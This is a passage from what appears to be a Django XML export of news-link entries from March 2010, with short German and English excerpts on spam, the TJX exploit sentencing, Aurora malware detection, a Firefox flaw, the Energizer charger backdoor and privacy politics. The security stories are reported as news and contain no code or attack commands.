zu haben, die dem Treiben der Täter Vorschub leistet. Dazu gehören neben dem Öffnen der E-Mail das Weiterleiten oder das Anklicken von URLs in den Spam-Mails. Fast die Hälfte dieser Gruppe (46 % und somit rund ein Viertel der Gesamtheit) tat dies in voller Absicht, also im Wissen, dass es sich nicht um ein seriöses Angebot handelte.
Neben möglichem Fehlverhalten in der Vergangenheit fragte die MAAWG aktuelle Gewohnheiten der Mail-Adressaten ab, und auch die werfen kein gutes Licht auf die Anwenderschaft. Nur 60 Prozent gaben explizit an, anscheinend betrügerische E-Mails nicht zu öffnen, und jeder achte Empfänger (12 %) klickt darin trotz eines mulmigen Gefühls auf einen Link, der eine Austragung aus der Mailingliste verspricht.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die MAAWG hat ihre Studie erstmals auf europäische Länder ausgeweitet und sieht die Vorjahresergebnisse aus den USA im Wesentlichen bestätigt. Nach den Erkenntnissen der Anti-Spam-Experten haben mehr als die Hälfte (57 %) der befragten Erwachsenen ausgesagt, bereits auf Spam in einer Weise reagiert zu haben, die dem Treiben der Täter Vorschub leistet. Dazu gehören neben dem Öffnen der E-Mail das Weiterleiten oder das Anklicken von URLs in den Spam-Mails. Fast die Hälfte dieser Gruppe (46 % und somit rund ein Viertel der Gesamtheit) tat dies in voller Absicht, also im Wissen, dass es sich nicht um ein seriöses Angebot handelte.
&lt;/p&gt;
&lt;p&gt;Neben möglichem Fehlverhalten in der Vergangenheit fragte die MAAWG aktuelle Gewohnheiten der Mail-Adressaten ab, und auch die werfen kein gutes Licht auf die Anwenderschaft. Nur 60 Prozent gaben explizit an, anscheinend betrügerische E-Mails nicht zu öffnen, und jeder achte Empfänger (12 %) klickt darin trotz eines mulmigen Gefühls auf einen Link, der eine Austragung aus der Mailingliste verspricht.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Spam-kommt-gut-an-963570.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/25/spam-kommt-gut-an.png</field><field type="SlugField" name="slug">spam-kommt-gut-an</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-25 14:26:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">e-mail spam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="41" model="submitter.newsentry"><field type="CharField" name="title">TJX Accomplice Gets Probation for Selling Browser Exploit | Threat Level | Wired.com</field><field type="TextField" name="excerpt">A computer security professional who provided Internet Explorer exploit code that helped hackers penetrate TJX and other companies was sentenced Tuesday in Boston to three years probation and a $10,000 fine.
Jeremy Jethro, 29, was paid $60,000 in cash by convicted TJX hacker Albert Gonzalez for a zero-day exploit against Microsofts browser, which Gonzalez and his co-conspirators used to obtain unauthorized access to company networks and steal more than 90 million credit and debit card numbers.
Read More http://www.wired.com/threatlevel/2010/03/jethro-sentencing/#ixzz0j1fIgcLy</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A computer security professional who provided Internet Explorer exploit code that helped hackers penetrate TJX and other companies was sentenced Tuesday in Boston to three years probation and a $10,000 fine.
&lt;/p&gt;
&lt;p&gt;Jeremy Jethro, 29, was paid $60,000 in cash by convicted TJX hacker Albert Gonzalez for a zero-day exploit against Microsofts browser, which Gonzalez and his co-conspirators used to obtain unauthorized access to company networks and steal more than 90 million credit and debit card numbers.
&lt;/p&gt;
&lt;p&gt;Read More http://www.wired.com/threatlevel/2010/03/jethro-sentencing/#ixzz0j1fIgcLy
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/03/jethro-sentencing/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/tjx-accomplice-gets-probation-for-selling-browser.png</field><field type="SlugField" name="slug">tjx-accomplice-gets-probation-for-selling-browser</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 19:30:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">aurora hack</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="40" model="submitter.newsentry"><field type="CharField" name="title">Israel aborts raid after soldier posts details on Facebook</field><field type="TextField" name="excerpt">
--Israeli Raid Called Off After Plan Details Posted on Facebook
(March 3 &amp; 4, 2010)
A planned Israeli raid on a Palestinian village in the West Bank was
called off after a soldier posted information about it on Facebook. The
post included details about the time and location of the planned sweep
and the name of his combat unit. Other soldiers who saw the post
alerted their superiors. The soldier was sentenced to 10 days in prison
and has been relieved of combat duty.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; --Israeli Raid Called Off After Plan Details Posted on Facebook
(March 3 &amp;amp; 4, 2010)
A planned Israeli raid on a Palestinian village in the West Bank was
called off after a soldier posted information about it on Facebook. The
post included details about the time and location of the planned sweep
and the name of his combat unit. Other soldiers who saw the post
alerted their superiors. The soldier was sentenced to 10 days in prison
and has been relieved of combat duty.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.smh.com.au/technology/technology-news/israel-aborts-raid-after-soldier-posts-details-on-facebook-20100304-pjfb.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/israel-aborts-raid-after-soldier-posts-details-on.png</field><field type="SlugField" name="slug">israel-aborts-raid-after-soldier-posts-details-on</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 15:44:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="39" model="submitter.newsentry"><field type="CharField" name="title">Cybercrime losses almost double • The Register</field><field type="TextField" name="excerpt"> --FBI: Cost of Reported Cybercrime in 2009 Was US $560 Million
(March 12 &amp; 15, 2010)
According to statistics from the FBI's Internet Crime Complaint Center
(IC3), the financial cost of cyber crime reported in the US more than
doubled between 2008 and 2009, totaling nearly US $560 million in 2009.
Among the most frequently reported attacks were phishing schemes that
purported to come from the FBI itself. The total number of cybercrime
complaints rose 22.9 percent from 257,284 submissions in 2008 to 336,655
submissions in 2009. Other often-reported schemes involved non-delivery
of Internet-purchased merchandise or payments for Internet purchases,
and phony anti-virus software.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; --FBI: Cost of Reported Cybercrime in 2009 Was US $560 Million
(March 12 &amp;amp; 15, 2010)
According to statistics from the FBI's Internet Crime Complaint Center
(IC3), the financial cost of cyber crime reported in the US more than
doubled between 2008 and 2009, totaling nearly US $560 million in 2009.
Among the most frequently reported attacks were phishing schemes that
purported to come from the FBI itself. The total number of cybercrime
complaints rose 22.9 percent from 257,284 submissions in 2008 to 336,655
submissions in 2009. Other often-reported schemes involved non-delivery
of Internet-purchased merchandise or payments for Internet purchases,
and phony anti-virus software.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/03/15/cybercrime_complaint_surge/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/cybercrime-losses-almost-double-the-register.png</field><field type="SlugField" name="slug">cybercrime-losses-almost-double-the-register</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 15:33:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="38" model="submitter.newsentry"><field type="CharField" name="title"> Update: Security industry faces attacks it cannot stop</field><field type="TextField" name="excerpt"> --Six of Seven AV Programs Tested Did Not Detect Aurora Attack Variants
(March 11, 2010)
A test of seven of commonly used anti-virus programs found that just one
detected variants of the malware that exploited the IE vulnerability
used in the Aurora attacks, which affected Google, Adobe and other US
companies. Rick Moy, president of NSS Labs, the company that performed
the tests, said that "vendors need to put more focus on the
vulnerability than on exploit protection." Threat detection and
mitigation need to evolve to meet the challenge of the emerging attacks.
OS and client software vendors need to shoulder their share of the
security burden.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; --Six of Seven AV Programs Tested Did Not Detect Aurora Attack Variants
(March 11, 2010)
A test of seven of commonly used anti-virus programs found that just one
detected variants of the malware that exploited the IE vulnerability
used in the Aurora attacks, which affected Google, Adobe and other US
companies. Rick Moy, president of NSS Labs, the company that performed
the tests, said that "vendors need to put more focus on the
vulnerability than on exploit protection." Threat detection and
mitigation need to evolve to meet the challenge of the emerging attacks.
OS and client software vendors need to shoulder their share of the
security burden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9169658/Update_Security_industry_faces_attacks_it_cannot_stop?taxonomyId=13&amp;pag</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/update-security-industry-faces-attacks-it-cannot.png</field><field type="SlugField" name="slug">update-security-industry-faces-attacks-it-cannot</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 15:31:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">aurora av</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="37" model="submitter.newsentry"><field type="CharField" name="title">Every citizen to have personal webpage - Telegraph</field><field type="TextField" name="excerpt">Everyone in the country is to be given a personalised webpage for accessing Government services within a year as part of a plan to save billions of pounds by putting all public services online, Gordon Brown is to announce.
Brown findet Broadband Inet Access auch so wichtig wie die Stromversorgung</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Everyone in the country is to be given a personalised webpage for accessing Government services within a year as part of a plan to save billions of pounds by putting all public services online, Gordon Brown is to announce.
&lt;/p&gt;
&lt;p&gt;Brown findet Broadband Inet Access auch so wichtig wie die Stromversorgung
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.telegraph.co.uk/technology/news/7484600/Every-citizen-to-have-personal-webpage.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/every-citizen-to-have-personal-webpage-telegraph.png</field><field type="SlugField" name="slug">every-citizen-to-have-personal-webpage-telegraph</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 15:07:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">uk</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="36" model="submitter.newsentry"><field type="CharField" name="title">
1968 ASCII Animation from Russia </field><field type="TextField" name="excerpt"> Its a bit of experimental computer animation of a cat done in Russia in 1968. The scientists who made it created hundreds of ASCII art images of the kitty, then printed them out and filmed them pose by pose.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; Its a bit of experimental computer animation of a cat done in Russia in 1968. The scientists who made it created hundreds of ASCII art images of the kitty, then printed them out and filmed them pose by pose.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://technologizer.com/2010/03/21/1968-ascii-animation-from-russia/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/1968-ascii-animation-from-russia.png</field><field type="SlugField" name="slug">1968-ascii-animation-from-russia</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 15:04:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">asciiart</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="35" model="submitter.newsentry"><field type="CharField" name="title">Slashdot IT Story | The Biggest Cloud Providers Are Botnets</field><field type="TextField" name="excerpt">"Google is made up of 500,000 systems, 1 million CPUs and 1,500 gigabits per second (Gbps) of bandwidth, according to cloud service provider Neustar. Amazon comes in second with 160,000 systems, 320,000 CPUs and 400 Gbps of bandwidth, while Rackspace offers 65,000 systems, 130,000 CPUs and 300 Gbps. But these clouds are dwarfed by the likes of the really big cloud services, otherwise known as botnets. Conficker controls 6.4 million computer systems in 230 countries, with more than 18 million CPUs and 28 terabits per second of bandwidth."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"Google is made up of 500,000 systems, 1 million CPUs and 1,500 gigabits per second (Gbps) of bandwidth, according to cloud service provider Neustar. Amazon comes in second with 160,000 systems, 320,000 CPUs and 400 Gbps of bandwidth, while Rackspace offers 65,000 systems, 130,000 CPUs and 300 Gbps. But these clouds are dwarfed by the likes of the really big cloud services, otherwise known as botnets. Conficker controls 6.4 million computer systems in 230 countries, with more than 18 million CPUs and 28 terabits per second of bandwidth."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://it.slashdot.org/story/10/03/23/1226241/The-Biggest-Cloud-Providers-Are-Botnets</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/slashdot-it-story-the-biggest-cloud-providers-ar.png</field><field type="SlugField" name="slug">slashdot-it-story-the-biggest-cloud-providers-ar</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:58:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">big</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="34" model="submitter.newsentry"><field type="CharField" name="title">heise online - Mehr als 20.000 Mitbeschwerden gegen ELENA</field><field type="TextField" name="excerpt">In der ersten Woche nach dem Start der [Website](https://petition.foebud.org/ELENA) für eine Mitmach-Verfassungsbeschwerde gegen die zentrale Erfassung von elektronischen Entgeltnachweisen (ELENA) haben dort bereits über 20.000 Mitbeschwerdeführende Vollmachten abgegeben. Das teilt der FoeBuD (Verein zur Förderung des öffentlichen bewegten und unbewegten Datenverkehrs) am heutigen Montag mit. Er hat die Aktion zusammen mit weiteren Datenschutzorganisationen initiiert.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In der ersten Woche nach dem Start der &lt;a href="https://petition.foebud.org/ELENA"&gt;Website&lt;/a&gt; für eine Mitmach-Verfassungsbeschwerde gegen die zentrale Erfassung von elektronischen Entgeltnachweisen (ELENA) haben dort bereits über 20.000 Mitbeschwerdeführende Vollmachten abgegeben. Das teilt der FoeBuD (Verein zur Förderung des öffentlichen bewegten und unbewegten Datenverkehrs) am heutigen Montag mit. Er hat die Aktion zusammen mit weiteren Datenschutzorganisationen initiiert.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Mehr-als-20-000-Mitbeschwerden-gegen-ELENA-960122.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/heise-online-mehr-als-20000-mitbeschwerden-gege.png</field><field type="SlugField" name="slug">heise-online-mehr-als-20000-mitbeschwerden-gege</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:52:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">elena</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="33" model="submitter.newsentry"><field type="CharField" name="title">heise online - Firefox 3.6.2 schließt schwerwiegende Sicherheitslücke</field><field type="TextField" name="excerpt">Bekannt wurde die Sicherheitslücke, als der russische Sicherheitsdienstleister Intevydis seinen Kunden einen Windows-Exploit dafür zur Verfügung stellte. Intevydis verhält sich gegenüber Herstellern, in deren Produkten sie Sicherheitslücken entdecken, wenig auskunftsfreudig, und verkauft sein Wissen. Der Entdecker Evgeny Legerov hatte mit seinem Fund zunächst angegeben, ohne Details zu nennen, später aber die Mozilla-Entwickler kontaktiert.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Bekannt wurde die Sicherheitslücke, als der russische Sicherheitsdienstleister Intevydis seinen Kunden einen Windows-Exploit dafür zur Verfügung stellte. Intevydis verhält sich gegenüber Herstellern, in deren Produkten sie Sicherheitslücken entdecken, wenig auskunftsfreudig, und verkauft sein Wissen. Der Entdecker Evgeny Legerov hatte mit seinem Fund zunächst angegeben, ohne Details zu nennen, später aber die Mozilla-Entwickler kontaktiert.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Firefox-3-6-2-schliesst-schwerwiegende-Sicherheitsluecke-961024.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/heise-online-firefox-362-schliet-schwerwiegen.png</field><field type="SlugField" name="slug">heise-online-firefox-362-schliet-schwerwiegen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:48:35</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">firefox vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="32" model="submitter.newsentry"><field type="CharField" name="title">Nottingham cops declare war on kids - Boing Boing</field><field type="TextField" name="excerpt">Police in Nottingham, England declared war on youth on Saturday night: anyone between 13-24 getting off a bus into town was sent through a metal-detector, and the streets were swarmed with drug-dogs that were set on young people.
Over 1,000 English cities and towns have a curfew for young people, giving police (and fake "citizen cops") the power to send kids home after dark for any reason, if, in their judgement, the kids are apt to be disturbing "real" people.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Police in Nottingham, England declared war on youth on Saturday night: anyone between 13-24 getting off a bus into town was sent through a metal-detector, and the streets were swarmed with drug-dogs that were set on young people.
&lt;/p&gt;
&lt;p&gt;Over 1,000 English cities and towns have a curfew for young people, giving police (and fake "citizen cops") the power to send kids home after dark for any reason, if, in their judgement, the kids are apt to be disturbing "real" people.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.boingboing.net/2010/03/21/nottingham-cops-decl.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/nottingham-cops-declare-war-on-kids-boing-boing.png</field><field type="SlugField" name="slug">nottingham-cops-declare-war-on-kids-boing-boing</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:41:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">uk</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object><object pk="7"></object></field></object><object pk="31" model="submitter.newsentry"><field type="CharField" name="title">Empörte Pakistaner: Freundschaftsreise in die USA endet mit Nacktscanner-Eklat - SPIEGEL ONLINE - Nachrichten - Politik</field><field type="TextField" name="excerpt">Eine Delegation pakistanischer Politiker sollte in den USA den neuen Geist der vertieften Partnerschaft beider Länder kennenlernen - doch die Reise nach Washington wurde zum Fiasko. Die Gäste sollten am Flughafen körpergescannt werden. Sie verweigerten sich empört. Und werden nun als Helden gefeiert.
Hamburg - Der Reiseplan war fein ausgearbeitet. Sechs pakistanische Politiker sollten sich in den USA davon überzeugen, wie sehr die Amerikaner an einer verstärkten Zusammenarbeit mit ihrem Heimatland interessiert sind. Treffen mit Obamas Spitzenberatern standen auf dem Programm, ein Besuch im Pentagon, einer im Nationalen Sicherheitsrat. Dazu eine Unkostenpauschale von 200 Dollar pro Tag und Person. Die Gastgeber in Washington hatten sich Mühe gegeben.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Eine Delegation pakistanischer Politiker sollte in den USA den neuen Geist der vertieften Partnerschaft beider Länder kennenlernen - doch die Reise nach Washington wurde zum Fiasko. Die Gäste sollten am Flughafen körpergescannt werden. Sie verweigerten sich empört. Und werden nun als Helden gefeiert.
&lt;/p&gt;
&lt;p&gt;Hamburg - Der Reiseplan war fein ausgearbeitet. Sechs pakistanische Politiker sollten sich in den USA davon überzeugen, wie sehr die Amerikaner an einer verstärkten Zusammenarbeit mit ihrem Heimatland interessiert sind. Treffen mit Obamas Spitzenberatern standen auf dem Programm, ein Besuch im Pentagon, einer im Nationalen Sicherheitsrat. Dazu eine Unkostenpauschale von 200 Dollar pro Tag und Person. Die Gastgeber in Washington hatten sich Mühe gegeben.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/politik/ausland/0,1518,682771,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/emporte-pakistaner-freundschaftsreise-in-die-usa.png</field><field type="SlugField" name="slug">emporte-pakistaner-freundschaftsreise-in-die-usa</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:37:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">nacktscanner</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="30" model="submitter.newsentry"><field type="CharField" name="title">Former TSA analyst charged with computer tampering - TSA, terrorism, tampering, analyst - Good Gear Guide</field><field type="TextField" name="excerpt">A U.S. Transport Security Administration analyst has been indicted with tampering with databases used by the TSA to identify possible terrorists who may be trying to fly in the U.S.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A U.S. Transport Security Administration analyst has been indicted with tampering with databases used by the TSA to identify possible terrorists who may be trying to fly in the U.S.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.goodgearguide.com.au/article/339185/former_tsa_analyst_charged_computer_tampering/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/no_page_shot.png</field><field type="SlugField" name="slug">former-tsa-analyst-charged-with-computer-tampering</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:35:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">crime</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="29" model="submitter.newsentry"><field type="CharField" name="title">
Energizer battery charger contains backdoor | Zero Day
| ZDNet.com
</field><field type="TextField" name="excerpt">The United States Computer Emergency Response Team (US-CERT) has warned that the software included in the Energizer DUO USB battery charger contains a backdoor that allows unauthorized remote system access.
In an [advisory](http://www.kb.cert.org/vuls/id/154421), the US-CERT warned that he installer for the Energizer DUO software places the file UsbCharger.dll in the applications directory and Arucer.dll in the Windows system32 directory.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The United States Computer Emergency Response Team (US-CERT) has warned that the software included in the Energizer DUO USB battery charger contains a backdoor that allows unauthorized remote system access.
&lt;/p&gt;
&lt;p&gt;In an &lt;a href="http://www.kb.cert.org/vuls/id/154421"&gt;advisory&lt;/a&gt;, the US-CERT warned that he installer for the Energizer DUO software places the file UsbCharger.dll in the applications directory and Arucer.dll in the Windows system32 directory.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blogs.zdnet.com/security/?p=5602&amp;tag=wrapper;col1</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/energizer-battery-charger-contains-backdoor.png</field><field type="SlugField" name="slug">energizer-battery-charger-contains-backdoor</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:33:08</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">hardware malware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="9"></object></field></object><object pk="28" model="submitter.newsentry"><field type="CharField" name="title">A Tool to Deceive and Slaughter</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://cgi.ebay.com/A-Tool-to-Deceive-and-Slaughter-2009-Caleb-Larsen_W0QQitemZ110508211602QQihZ001QQcategoryZ60442QQcmdZViewItemQQ_trksidZp4340.m444QQ_trkparmsZalgo%3DCRX%26its%3DC%252BS%26itu%3DSI%252BUA%252BLM%252BLA%26otn%3D1%</field><field type="FileField" name="page_screenshot">page_shots/2010/03/23/a-tool-to-deceive-and-slaughter.png</field><field type="SlugField" name="slug">a-tool-to-deceive-and-slaughter</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-23 14:28:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">hack hardware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="27" model="submitter.newsentry"><field type="CharField" name="title">heise online - SCO vs. Linux: Die Jury ist aufgeklärt</field><field type="TextField" name="excerpt">* Never ending story
* Verhandlung über Copyright neu, da von Geschworenen beurteilt werden muss.
&gt; Die Autoren des HP-Memorandums waren der Meinung, dass der Kauf einer Lizenz ähnlich zu bewerten sei wie die Unterstützung von Terroristen durch Geldzahlungen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;ul&gt;
&lt;li&gt;
Never ending story
&lt;/li&gt;
&lt;li&gt;
Verhandlung über Copyright neu, da von Geschworenen beurteilt werden muss.
&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;&lt;p&gt;Die Autoren des HP-Memorandums waren der Meinung, dass der Kauf einer Lizenz ähnlich zu bewerten sei wie die Unterstützung von Terroristen durch Geldzahlungen.
&lt;/p&gt;
&lt;/blockquote&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/SCO-vs-Linux-Die-Jury-ist-aufgeklaert-959328.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/20/heise-online-sco-vs-linux-die-jury-ist-aufgekl.png</field><field type="SlugField" name="slug">heise-online-sco-vs-linux-die-jury-ist-aufgekl</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-20 12:38:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">novell sco</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="26" model="submitter.newsentry"><field type="CharField" name="title">ff flaw and browser roundup</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/03/19/firefox_chrome_security_updates/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/20/ff-flaw-and-browser-roundup.png</field><field type="SlugField" name="slug">ff-flaw-and-browser-roundup</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-20 00:08:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">1</field><field type="CharField" name="tags_string">browser vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="25" model="submitter.newsentry"><field type="CharField" name="title">Google about to pull the plug in China</field><field type="TextField" name="excerpt">Google will am 10. April google.cn abschalten. Sonst machen sie weiter... Spannend.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google will am 10. April google.cn abschalten. Sonst machen sie weiter... Spannend.
